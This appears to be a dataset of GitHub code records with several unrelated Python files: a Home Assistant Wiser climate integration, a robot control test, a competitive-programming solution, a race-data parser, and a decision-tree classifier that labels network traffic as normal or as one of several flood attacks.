+{"seq_id": "17150029031", "text": "\"\"\"\nClimate Platform Device for Wiser Rooms.\n\nhttps://github.com/asantaga/wiserHomeAssistantPlatform\nAngelosantagata@gmail.com\n\n\"\"\"\nfrom functools import partial\n\nimport voluptuous as vol\n\nfrom homeassistant.components.climate.const import (\n CURRENT_HVAC_HEAT,\n CURRENT_HVAC_IDLE,\n HVAC_MODE_AUTO,\n HVAC_MODE_HEAT,\n HVAC_MODE_OFF,\n SUPPORT_PRESET_MODE,\n SUPPORT_TARGET_TEMPERATURE,\n)\nfrom homeassistant.const import ATTR_ENTITY_ID, ATTR_TEMPERATURE, TEMP_CELSIUS\nfrom homeassistant.core import callback\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.dispatcher import async_dispatcher_connect\nfrom homeassistant.util import dt\n\nfrom .const import (\n _LOGGER,\n CONF_BOOST_TEMP,\n CONF_BOOST_TEMP_TIME,\n DATA,\n DOMAIN,\n MANUFACTURER,\n ROOM,\n WISER_SERVICES,\n)\n\ntry:\n from homeassistant.components.climate import ClimateEntity\nexcept ImportError:\n from homeassistant.components.climate import ClimateDevice as ClimateEntity\n\n\nATTR_TIME_PERIOD = \"time_period\"\nATTR_TEMPERATURE_DELTA = \"temperature_delta\"\n\nPRESET_AWAY = \"Away Mode\"\nPRESET_AWAY_BOOST = \"Away Boost\"\nPRESET_AWAY_OVERRIDE = \"Away Override\"\nPRESET_BOOST = \"boost\"\nPRESET_BOOST30 = \"Boost 30m\"\nPRESET_BOOST60 = \"Boost 1h\"\nPRESET_BOOST120 = \"Boost 2h\"\nPRESET_BOOST180 = \"Boost 3h\"\nPRESET_BOOST_CANCEL = \"Cancel Boost\"\nPRESET_OVERRIDE = \"Override\"\n\nWISER_PRESET_TO_HASS = {\n \"fromawaymode\": PRESET_AWAY,\n \"frommanualmode\": None,\n \"fromboost\": PRESET_BOOST,\n \"frommanualoverrideduringaway\": PRESET_AWAY_OVERRIDE,\n \"fromboostduringaway\": PRESET_AWAY_BOOST,\n \"frommanualoverride\": PRESET_OVERRIDE,\n \"fromecoiq\": None,\n \"fromschedule\": None,\n \"fromcomfortmode\": None,\n}\n\nHASS_HVAC_TO_WISER = {\n HVAC_MODE_AUTO: \"auto\",\n HVAC_MODE_HEAT: \"manual\",\n HVAC_MODE_OFF: \"manual\",\n}\n\nSUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE\n\nBOOST_HEATING_SCHEMA = vol.Schema(\n {\n vol.Required(ATTR_ENTITY_ID): cv.entity_id,\n vol.Optional(ATTR_TIME_PERIOD, default=0): vol.Coerce(int),\n vol.Optional(ATTR_TEMPERATURE, default=0): vol.Coerce(float),\n vol.Optional(ATTR_TEMPERATURE_DELTA, default=0): vol.Coerce(float),\n }\n)\n\nasync def async_setup_entry(hass, config_entry, async_add_entities):\n \"\"\"Set up Wiser climate device.\"\"\"\n data = hass.data[DOMAIN][config_entry.entry_id][DATA] # Get Handler\n\n if (data.wiserhub.getRooms()) is not None:\n wiser_rooms = [\n WiserRoom(hass, data, room.get(\"id\")) for room in data.wiserhub.getRooms()\n ]\n else:\n wiser_rooms = None\n async_add_entities(wiser_rooms, True)\n\n @callback\n def heating_boost(service):\n \"\"\"Handle the service call.\"\"\"\n entity_id = service.data[ATTR_ENTITY_ID]\n boost_time = service.data[ATTR_TIME_PERIOD]\n boost_temp = service.data[ATTR_TEMPERATURE]\n boost_temp_delta = service.data[ATTR_TEMPERATURE_DELTA]\n\n # Set to config values if not set\n if boost_time == 0:\n boost_time = config_entry.options[CONF_BOOST_TEMP_TIME]\n\n if boost_temp == 0 and boost_temp_delta == 0:\n boost_temp_delta = config_entry.options[CONF_BOOST_TEMP]\n\n # Find correct room to boost\n for room in wiser_rooms:\n _LOGGER.debug(\"BOOST for %s\", room.entity_id)\n if room.entity_id == entity_id:\n if boost_temp_delta > 0:\n boost_temp = (room.current_temperature) + boost_temp_delta\n _LOGGER.info(\n \"Boost service called for %s to set to %sC for %s mins.\",\n room.name,\n boost_temp,\n boost_time,\n )\n\n 
hass.async_create_task(\n room.set_room_mode(room.room_id, \"boost\", boost_temp, boost_time)\n )\n room.schedule_update_ha_state(True)\n break\n\n \n\n hass.services.async_register(\n DOMAIN,\n WISER_SERVICES[\"SERVICE_BOOST_HEATING\"],\n heating_boost,\n schema=BOOST_HEATING_SCHEMA,\n )\n\n\nclass WiserRoom(ClimateEntity):\n \"\"\"WiserRoom ClientEntity Object.\"\"\"\n\n def __init__(self, hass, data, room_id):\n \"\"\"Initialize the sensor.\"\"\"\n self.data = data\n self.hass = hass\n self.schedule = {}\n self.room_id = room_id\n self._force_update = False\n self._hvac_modes_list = [HVAC_MODE_AUTO, HVAC_MODE_HEAT, HVAC_MODE_OFF]\n self._preset_modes_list = [\n PRESET_BOOST30,\n PRESET_BOOST60,\n PRESET_BOOST120,\n PRESET_BOOST180,\n PRESET_BOOST_CANCEL,\n ]\n _LOGGER.info(\n \"Wiser Room Initialisation for %s\",\n self.data.wiserhub.getRoom(self.room_id).get(\"Name\"),\n )\n\n async def async_update(self):\n \"\"\"Async update method.\"\"\"\n _LOGGER.debug(\"WiserRoom Update requested for %s\", self.name)\n if self._force_update:\n await self.data.async_update(no_throttle=True)\n self._force_update = False\n self.schedule = self.data.wiserhub.getRoomSchedule(self.room_id)\n # Testing for adding schedule ids to hub controller entity\n self.data.schedules[str(self.entity_id)] = self.data.wiserhub.getRoom(self.room_id).get(\"ScheduleId\")\n\n @property\n def supported_features(self):\n \"\"\"Return the list of supported features.\"\"\"\n return SUPPORT_FLAGS\n\n @property\n def should_poll(self):\n \"\"\"We don't want polling so return false.\"\"\"\n return False\n\n @property\n def state(self):\n \"\"\"Return stategit s.\"\"\"\n state = self.data.wiserhub.getRoom(self.room_id).get(\"Mode\")\n current_temp = self.data.wiserhub.getRoom(self.room_id).get(\"DisplayedSetPoint\")\n _LOGGER.info(\"State requested for room %s, state=%s\", self.room_id, state)\n\n if state.lower() == \"manual\":\n if current_temp == -200:\n state = HVAC_MODE_OFF\n else:\n state = HVAC_MODE_HEAT\n else:\n state = HVAC_MODE_AUTO\n return state\n\n @property\n def name(self):\n \"\"\"Return Name of device.\"\"\"\n return \"Wiser \" + self.data.wiserhub.getRoom(self.room_id).get(\"Name\")\n\n @property\n def temperature_unit(self):\n \"\"\"Return temp units.\"\"\"\n return TEMP_CELSIUS\n\n @property\n def min_temp(self):\n \"\"\"Return min temp from data.\"\"\"\n return self.data.minimum_temp\n\n @property\n def max_temp(self):\n \"\"\"Return max temp from data.\"\"\"\n return self.data.maximum_temp\n\n @property\n def current_temperature(self):\n \"\"\"Return current temp from data.\"\"\"\n raw = self.data.wiserhub.getRoom(self.room_id).get(\"CalculatedTemperature\")\n if raw == -32768: # Reported temperature if there are no thermostats available\n return None\n return raw / 10\n\n @property\n def icon(self):\n \"\"\"Return icon to show if radiator is heating, not heating or set to off.\"\"\"\n if self.data.wiserhub.getRoom(self.room_id).get(\"ControlOutputState\") == \"On\":\n return \"mdi:radiator\"\n if self.data.wiserhub.getRoom(self.room_id).get(\"CurrentSetPoint\") == -200:\n return \"mdi:radiator-off\"\n return \"mdi:radiator-disabled\"\n\n @property\n def unique_id(self):\n \"\"\"Return unique Id.\"\"\"\n return f\"WiserRoom-{self.room_id}\"\n\n @property\n def device_info(self):\n \"\"\"Return device specific attributes.\"\"\"\n return {\n \"name\": self.name,\n \"identifiers\": {(DOMAIN, self.unique_id)},\n \"manufacturer\": MANUFACTURER,\n \"model\": ROOM.title(),\n }\n\n @property\n def 
hvac_action(self):\n \"\"\"Return hvac action from data.\"\"\"\n if self.data.wiserhub.getRoom(self.room_id).get(\"ControlOutputState\") == \"On\":\n return CURRENT_HVAC_HEAT\n return CURRENT_HVAC_IDLE\n\n @property\n def hvac_mode(self):\n \"\"\"Return set hvac mode.\"\"\"\n state = self.data.wiserhub.getRoom(self.room_id).get(\"Mode\")\n current_set_point = self.data.wiserhub.getRoom(self.room_id).get(\n \"CurrentSetPoint\"\n )\n if state.lower() == \"manual\":\n if current_set_point == -200:\n state = HVAC_MODE_OFF\n else:\n state = HVAC_MODE_HEAT\n if state.lower() == \"auto\":\n state = HVAC_MODE_AUTO\n return state\n\n async def async_set_hvac_mode(self, hvac_mode):\n \"\"\"Set new operation mode.\"\"\"\n _LOGGER.info(\n \"Setting Device Operation %s for roomId %s\", hvac_mode, self.room_id,\n )\n # Convert HA heat_cool to manual as required by api\n if hvac_mode == HVAC_MODE_HEAT:\n hvac_mode = \"manual\"\n await self.set_room_mode(self.room_id, hvac_mode)\n return True\n\n @property\n def hvac_modes(self):\n \"\"\"Return the list of available operation modes.\"\"\"\n return self._hvac_modes_list\n\n @property\n def preset_mode(self):\n \"\"\"Set preset mode.\"\"\"\n # Added fix for old firmware where capitalisation of name is different\n wiser_preset = self.data.wiserhub.getRoom(self.room_id).get(\n \"SetpointOrigin\",\n self.data.wiserhub.getRoom(self.room_id).get(\"SetPointOrigin\", \"NA\"),\n )\n mode = self.data.wiserhub.getRoom(self.room_id).get(\"Mode\")\n\n if (\n mode.lower() == HVAC_MODE_AUTO\n and wiser_preset.lower() == \"frommanualoverride\"\n ):\n preset = PRESET_OVERRIDE\n else:\n try:\n preset = WISER_PRESET_TO_HASS[wiser_preset.lower()]\n except KeyError:\n preset = None\n return preset\n\n async def async_set_preset_mode(self, preset_mode):\n \"\"\"Async call to set preset mode .\"\"\"\n boost_time = self.data.boost_time\n boost_temp = self.data.boost_temp\n\n _LOGGER.debug(\n \"*******Setting Preset Mode %s for roomId %s\", preset_mode, self.room_id,\n )\n # Convert HA preset to required api presets\n\n # Cancel boost mode\n if preset_mode.lower() == PRESET_BOOST_CANCEL.lower():\n# Change based on https://github.com/halfofabanana/wiserHomeAssistantPlatform/commit/463095bd9c4837107f6c8cf6fdb9084f9d68d883\n# Return to corect setpoint after override cancellation\n if self.hvac_mode == HVAC_MODE_HEAT:\n preset_mode = \"auto_to_manual\"\n else:\n preset_mode = HASS_HVAC_TO_WISER[self.hvac_mode] \n\n\n # Deal with boost time variations\n if preset_mode.lower() == PRESET_BOOST30.lower():\n boost_time = 30\n if preset_mode.lower() == PRESET_BOOST60.lower():\n boost_time = 60\n if preset_mode.lower() == PRESET_BOOST120.lower():\n boost_time = 120\n if preset_mode.lower() == PRESET_BOOST180.lower():\n boost_time = 180\n\n # Set boost mode\n if preset_mode[:5].lower() == PRESET_BOOST.lower():\n preset_mode = PRESET_BOOST\n\n # Set boost temp to current + boost_temp\n boost_temp = (\n self.data.wiserhub.getRoom(self.room_id).get(\"CalculatedTemperature\")\n / 10\n ) + boost_temp\n\n await self.set_room_mode(self.room_id, preset_mode, boost_temp, boost_time)\n return True\n\n @property\n def preset_modes(self):\n \"\"\"Return the list of available preset modes.\"\"\"\n return self._preset_modes_list\n\n @property\n def target_temperature(self):\n \"\"\"Return target temp.\"\"\"\n current_set_point = self.data.wiserhub.getRoom(self.room_id).get(\n \"DisplayedSetPoint\"\n )\n\n if current_set_point == -200:\n return None\n\n return current_set_point / 10\n\n @property\n def 
state_attributes(self):\n \"\"\"Return state attributes.\"\"\"\n # Generic attributes\n attrs = super().state_attributes\n\n # If boosted show boost end time\n #if self.data.wiserhub.getRoom(self.room_id).get(\"OverrideTimeoutUnixTime\", 0) > 0:\n boost_end = self.data.wiserhub.getRoom(self.room_id).get(\"OverrideTimeoutUnixTime\", 0)\n\n attrs[\"boost_end\"] = dt.utc_from_timestamp(boost_end)\n\n if boost_end > 0:\n boost_remaining = dt.utc_from_timestamp(\n self.data.wiserhub.getRoom(self.room_id).get(\"OverrideTimeoutUnixTime\", 0)\n ) - dt.utc_from_timestamp(self.data.wiserhub.getSystem().get(\"UnixTime\", 0))\n attrs[\"boost_remaining\"] = int(boost_remaining.total_seconds()/60)\n else:\n attrs[\"boost_remaining\"] = 0\n \n\n \n attrs[\"percentage_demand\"] = self.data.wiserhub.getRoom(self.room_id).get(\n \"PercentageDemand\"\n )\n attrs[\"control_output_state\"] = self.data.wiserhub.getRoom(self.room_id).get(\n \"ControlOutputState\"\n )\n attrs[\"heating_rate\"] = self.data.wiserhub.getRoom(self.room_id).get(\n \"HeatingRate\"\n )\n attrs[\"window_state\"] = self.data.wiserhub.getRoom(self.room_id).get(\n \"WindowState\"\n )\n attrs[\"window_detection_active\"] = self.data.wiserhub.getRoom(self.room_id).get(\n \"WindowDetectionActive\"\n )\n attrs[\"away_mode_supressed\"] = self.data.wiserhub.getRoom(self.room_id).get(\n \"AwayModeSuppressed\"\n )\n\n return attrs\n\n async def async_set_temperature(self, **kwargs):\n \"\"\"Set new target temperatures.\"\"\"\n target_temperature = kwargs.get(ATTR_TEMPERATURE)\n if target_temperature is None:\n return False\n\n if self.data.setpoint_mode == \"boost\":\n _LOGGER.info(\"Setting temperature for %s to %s using boost method.\", self.name, target_temperature)\n\n await self.set_room_mode(self.room_id, \"boost\", target_temperature)\n else:\n _LOGGER.info(\"Setting temperature for %s to %s\", self.name, target_temperature)\n\n await self.hass.async_add_executor_job(\n partial(\n self.data.wiserhub.setRoomTemperature, self.room_id, target_temperature,\n )\n )\n self._force_update = True\n await self.async_update_ha_state(True)\n\n return True\n\n async def set_room_mode(self, room_id, mode, boost_temp=None, boost_time=None):\n \"\"\"Set to default values if not passed in.\"\"\"\n boost_temp = self.data.boost_temp if boost_temp is None else boost_temp\n boost_time = self.data.boost_time if boost_time is None else boost_time\n _LOGGER.debug(\"Setting Room Mode to %s for roomId %s\", mode, self.room_id)\n await self.hass.async_add_executor_job(\n partial(\n self.data.wiserhub.setRoomMode, room_id, mode, boost_temp, boost_time,\n )\n )\n self._force_update = True\n await self.async_update_ha_state(True)\n return True\n\n async def async_added_to_hass(self):\n \"\"\"Subscribe for update from the hub.\"\"\"\n\n async def async_update_state():\n \"\"\"Update sensor state.\"\"\"\n await self.async_update_ha_state(True)\n\n self.async_on_remove(\n async_dispatcher_connect(\n self.hass, \"WiserHubUpdateMessage\", async_update_state\n )\n )\n", "repo_name": "jabastien/Home-AssistantConfig", "sub_path": "custom_components/wiser/climate.py", "file_name": "climate.py", "file_ext": "py", "file_size_in_byte": 15508, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "homeassistant.components.climate.const.HVAC_MODE_AUTO", "line_number": 71, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_HEAT", "line_number": 72, "usage_type": "name"}, 
{"api_name": "homeassistant.components.climate.const.HVAC_MODE_OFF", "line_number": 73, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.SUPPORT_TARGET_TEMPERATURE", "line_number": 76, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.SUPPORT_PRESET_MODE", "line_number": 76, "usage_type": "name"}, {"api_name": "voluptuous.Schema", "line_number": 78, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 80, "usage_type": "call"}, {"api_name": "homeassistant.const.ATTR_ENTITY_ID", "line_number": 80, "usage_type": "argument"}, {"api_name": "voluptuous.Optional", "line_number": 81, "usage_type": "call"}, {"api_name": "voluptuous.Optional", "line_number": 82, "usage_type": "call"}, {"api_name": "homeassistant.const.ATTR_TEMPERATURE", "line_number": 82, "usage_type": "argument"}, {"api_name": "voluptuous.Optional", "line_number": 83, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation.entity_id", "line_number": 80, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 80, "usage_type": "name"}, {"api_name": "voluptuous.Coerce", "line_number": 81, "usage_type": "call"}, {"api_name": "voluptuous.Coerce", "line_number": 82, "usage_type": "call"}, {"api_name": "voluptuous.Coerce", "line_number": 83, "usage_type": "call"}, {"api_name": "const.DOMAIN", "line_number": 89, "usage_type": "name"}, {"api_name": "const.DATA", "line_number": 89, "usage_type": "name"}, {"api_name": "homeassistant.const.ATTR_ENTITY_ID", "line_number": 102, "usage_type": "name"}, {"api_name": "homeassistant.const.ATTR_TEMPERATURE", "line_number": 104, "usage_type": "name"}, {"api_name": "const.CONF_BOOST_TEMP_TIME", "line_number": 109, "usage_type": "name"}, {"api_name": "const.CONF_BOOST_TEMP", "line_number": 112, "usage_type": "name"}, {"api_name": "const._LOGGER.debug", "line_number": 116, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 116, "usage_type": "name"}, {"api_name": "const._LOGGER.info", "line_number": 120, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 120, "usage_type": "name"}, {"api_name": "homeassistant.core.callback", "line_number": 99, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 136, "usage_type": "argument"}, {"api_name": "const.WISER_SERVICES", "line_number": 137, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.ClimateDevice", "line_number": 143, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_AUTO", "line_number": 153, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_HEAT", "line_number": 153, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_OFF", "line_number": 153, "usage_type": "name"}, {"api_name": "const._LOGGER.info", "line_number": 161, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 161, "usage_type": "name"}, {"api_name": "const._LOGGER.debug", "line_number": 168, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 168, "usage_type": "name"}, {"api_name": "const._LOGGER.info", "line_number": 191, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 191, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_OFF", "line_number": 195, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_HEAT", "line_number": 197, "usage_type": "name"}, {"api_name": 
"homeassistant.components.climate.const.HVAC_MODE_AUTO", "line_number": 199, "usage_type": "name"}, {"api_name": "homeassistant.const.TEMP_CELSIUS", "line_number": 210, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 249, "usage_type": "name"}, {"api_name": "const.MANUFACTURER", "line_number": 250, "usage_type": "name"}, {"api_name": "const.ROOM.title", "line_number": 251, "usage_type": "call"}, {"api_name": "const.ROOM", "line_number": 251, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.CURRENT_HVAC_HEAT", "line_number": 258, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.CURRENT_HVAC_IDLE", "line_number": 259, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_OFF", "line_number": 270, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_HEAT", "line_number": 272, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_AUTO", "line_number": 274, "usage_type": "name"}, {"api_name": "const._LOGGER.info", "line_number": 279, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 279, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_HEAT", "line_number": 283, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_AUTO", "line_number": 304, "usage_type": "name"}, {"api_name": "const._LOGGER.debug", "line_number": 320, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 320, "usage_type": "name"}, {"api_name": "homeassistant.components.climate.const.HVAC_MODE_HEAT", "line_number": 329, "usage_type": "name"}, {"api_name": "homeassistant.util.dt.utc_from_timestamp", "line_number": 385, "usage_type": "call"}, {"api_name": "homeassistant.util.dt", "line_number": 385, "usage_type": "name"}, {"api_name": "homeassistant.util.dt.utc_from_timestamp", "line_number": 388, "usage_type": "call"}, {"api_name": "homeassistant.util.dt", "line_number": 388, "usage_type": "name"}, {"api_name": "homeassistant.util.dt.utc_from_timestamp", "line_number": 390, "usage_type": "call"}, {"api_name": "homeassistant.util.dt", "line_number": 390, "usage_type": "name"}, {"api_name": "homeassistant.const.ATTR_TEMPERATURE", "line_number": 420, "usage_type": "argument"}, {"api_name": "const._LOGGER.info", "line_number": 425, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 425, "usage_type": "name"}, {"api_name": "const._LOGGER.info", "line_number": 429, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 429, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 432, "usage_type": "call"}, {"api_name": "const._LOGGER.debug", "line_number": 445, "usage_type": "call"}, {"api_name": "const._LOGGER", "line_number": 445, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 447, "usage_type": "call"}, {"api_name": "homeassistant.helpers.dispatcher.async_dispatcher_connect", "line_number": 463, "usage_type": "call"}]}
+{"seq_id": "16937174750", "text": "import test_base # pylint: disable=import-error\nimport numpy as np\nimport time\nimport logging\n\nfrom thundervolt.comm.vision import FiraVision\nfrom thundervolt.comm.control import FiraControl\nfrom thundervolt.actions.look_at_action import LookAtAction\n\nTEST_ROBOT = 1\n\nANGLES = [np.pi / 2, np.pi, 3 * np.pi / 4, 3 * np.pi / 2, 0]\n\ndef main():\n team_color_yellow = False\n vision = FiraVision(team_color_yellow)\n blue_control = FiraControl(team_color_yellow)\n\n action = LookAtAction(kp=10.0, ki=0.005, kd=3.0, tolerance=0.08)\n\n blue_control.transmit_robot(TEST_ROBOT, 0, 0)\n\n for angle in ANGLES:\n action.initialize(TEST_ROBOT)\n action.set_angle(angle)\n while True:\n vision_data = vision.receive_field_data()\n robot_cmd, action_state = action.update(vision_data)\n\n blue_control.transmit_robot(TEST_ROBOT, robot_cmd.left_speed, robot_cmd.right_speed)\n\n if action_state == True:\n logging.info(f\"Reached {angle * 180 / np.pi}º\")\n break\n\n time.sleep(1)\n\n blue_control.transmit_robot(TEST_ROBOT, 0, 0)\n logging.info(\"Yay finished!\\r\\n\")\n\nif __name__ == '__main__':\n main()\n", "repo_name": "ThundeRatz/fira_thundervolt", "sub_path": "integration_tests/test_look_at_action.py", "file_name": "test_look_at_action.py", "file_ext": "py", "file_size_in_byte": 1196, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.pi", "line_number": 12, "usage_type": "attribute"}, {"api_name": "thundervolt.comm.vision.FiraVision", "line_number": 16, "usage_type": "call"}, {"api_name": "thundervolt.comm.control.FiraControl", "line_number": 17, "usage_type": "call"}, {"api_name": "thundervolt.actions.look_at_action.LookAtAction", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 33, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 39, "usage_type": "call"}]}
+{"seq_id": "12657659136", "text": "import itertools\nn=int(input())\nli=[]\nfor _ in range(n):\n li.append(input())\nfor i in itertools.combinations(li,3):\n x1,y1=map(int,i[0].split())\n x2,y2=map(int,i[1].split())\n x3,y3=map(int,i[2].split())\n if x1==x2==x3 or y1==y2==y3:\n print(\"Yes\")\n exit()\n if x2-x1==0 or x3-x1 == 0:\n continue\n a1=(y2-y1)/(x2-x1)\n a2=(y3-y1)/(x3-x1)\n if a1!=a2:\n continue\n if a1*(x2-x1)==0 or a2*(x3-x1) == 0:\n continue\n b1=(y2-y1)/(a1*(x2-x1))\n b2=(y3-y1)/(a2*(x3-x1))\n if a1==a2 and b1==b2:\n print(\"Yes\")\n exit()\nprint(\"No\")\n", "repo_name": "mono-0812/procon", "sub_path": "atcoder.jp/abc181/abc181_c/Main.py", "file_name": "Main.py", "file_ext": "py", "file_size_in_byte": 544, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "itertools.combinations", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "37943503108", "text": "import json\nfrom collections import defaultdict\n\n\ndef top_positions(course):\n filename = 'data_{}.json'.format(course)\n with open(filename, 'r') as json_data:\n dict_list = json.load(json_data)\n tortues = defaultdict(lambda: defaultdict(list))\n for data_dict in dict_list:\n tortoises = data_dict['tortoises']\n for i in range(len(tortoises)):\n tortue = tortoises[i]\n tortues[i]['top'].append(tortue['top'])\n tortues[i]['position'].append(tortue['position'])\n return tortues\n\ndef vitesses(tortue):\n tops = tortue['top']\n positions = tortue['position']\n for j in range(len(tops)-1):\n vitesse = (positions[j+1] - positions[j]) / (tops[j+1] - tops[j])\n tortue['vitesse'].append(vitesse)\n\ndef accelerations(tortue):\n tops = tortue['top']\n vitesses = tortue['vitesse']\n for j in range(len(vitesses)-1):\n acc = abs(vitesses[j+1] - vitesses[j]) / (tops[j+2] - tops[j+1])\n tortue['acc'].append(acc)\n\n\ndef tortues_attr(course):\n tortues = top_positions(course)\n for i in tortues:\n tortue = tortues[i]\n vitesses(tortue)\n accelerations(tortue)\n return tortues\n\n\n ", "repo_name": "bsnflorian/course_de_tortues", "sub_path": "parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 1225, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 8, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 9, "usage_type": "call"}]}
+{"seq_id": "70813105767", "text": "#Decision Tree\n\n#Importing the Libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport time \n\n#importing dataset\ndataset = pd.read_csv('rawdata_selected.csv')\n###Taking care of missing value/ Missing value = 0\ndataset = dataset.fillna(0)\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 25].values\n\n##Encoding port\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder_port = LabelEncoder()\nX[:,4] = labelencoder_port.fit_transform(X[:,4])\nonehotencoder = OneHotEncoder(categorical_features=[4])\nX = onehotencoder.fit_transform(X).toarray()\n\n#Encoding y (0= normal, 1=icmp flood attack, 2=tcp xmas flood, 3=udp flood )\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\ny = np.reshape(y, (-1,1))\nonehotencoder_y = OneHotEncoder(categorical_features=[0])\ny = onehotencoder_y.fit_transform(y).toarray()\n\n#Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split \nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 1)\n\n#Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n#Fitting Classifier Decision Tree to the Training Set\nfrom sklearn.tree import DecisionTreeClassifier\nstart_training = time.time()\nclassifier = DecisionTreeClassifier(criterion='entropy', random_state=0)\nclassifier.fit(X_train, y_train)\nend_training = time.time()\n\n#predicting the test set result\nstart_testing = time.time()\ny_pred = classifier.predict(X_test)\nend_testing = time.time()\n\ntraining_time = end_training - start_training\ntesting_time = end_testing - start_testing\n\n#Making the confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm_dt = confusion_matrix(y_test.ravel(), y_pred.ravel())\n\n#Calculate accuracy_score\nfrom sklearn.metrics import accuracy_score\naccuracy_dt = accuracy_score(y_test, y_pred)\naccuracy_dt_normalize = accuracy_score(y_test, y_pred, normalize=False)\n\n#Applying k-Fold Cross Validation\nfrom sklearn.model_selection import cross_val_score\naccuracies_kfold =cross_val_score(estimator=classifier, X = X_train, y = y_train, cv = 10, n_jobs=-1)\naccuracies_kfold_mean = accuracies_kfold.mean()\naccuracies_kfold_std = accuracies_kfold.std()\n\n#####################TESTBED###################################################\ntestbed = pd.read_csv('testbed_selected.csv')\ntestbed = testbed.fillna(0)\n\nX_testbed = testbed.iloc[:, :-1].values\ny_testbed = testbed.iloc[:, 25].values\n\nimport random \ncounter = 5\nnew_X = X_testbed[1,:]\nnew_y = y_testbed[1]\n\nfor x in range(counter):\n rand_normal = random.randint(0,1000)\n rand_icmp = random.randint(1000,2000)\n rand_tcp = random.randint(2000,3000)\n rand_udp = random.randint(3000,4001)\n new_X = np.vstack((X_testbed[rand_normal,:].T, X_testbed[rand_icmp,:].T, X_testbed[rand_tcp,:].T, X_testbed[rand_udp,:].T, new_X))\n new_y = np.vstack((y_testbed[rand_normal], y_testbed[rand_icmp], y_testbed[rand_tcp], y_testbed[rand_udp], new_y))\n\n\n#encoding X\nnew_X = onehotencoder.fit_transform(new_X).toarray() \n#encoding Y\nnew_y = onehotencoder_y.fit_transform(new_y).toarray()\n\n\ny_pred_testbed = classifier.predict(new_X)\naccuracy_dt_testbed = accuracy_score(new_y,y_pred_testbed)\naccuracy_dt_normalize = accuracy_score(new_y, y_pred_testbed, normalize=False)\naccuracy_kfold_testbed = 
cross_val_score(estimator=classifier, X=new_X, y=new_y, cv=10, n_jobs=1)\naccuracy_kfold_testbed_mean = accuracy_kfold_testbed.mean()\n", "repo_name": "Bennoli13/DDoS_ML", "sub_path": "DT.py", "file_name": "DT.py", "file_ext": "py", "file_size_in_byte": 3539, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 10, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 18, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 35, "usage_type": "call"}, {"api_name": "time.time", "line_number": 41, "usage_type": 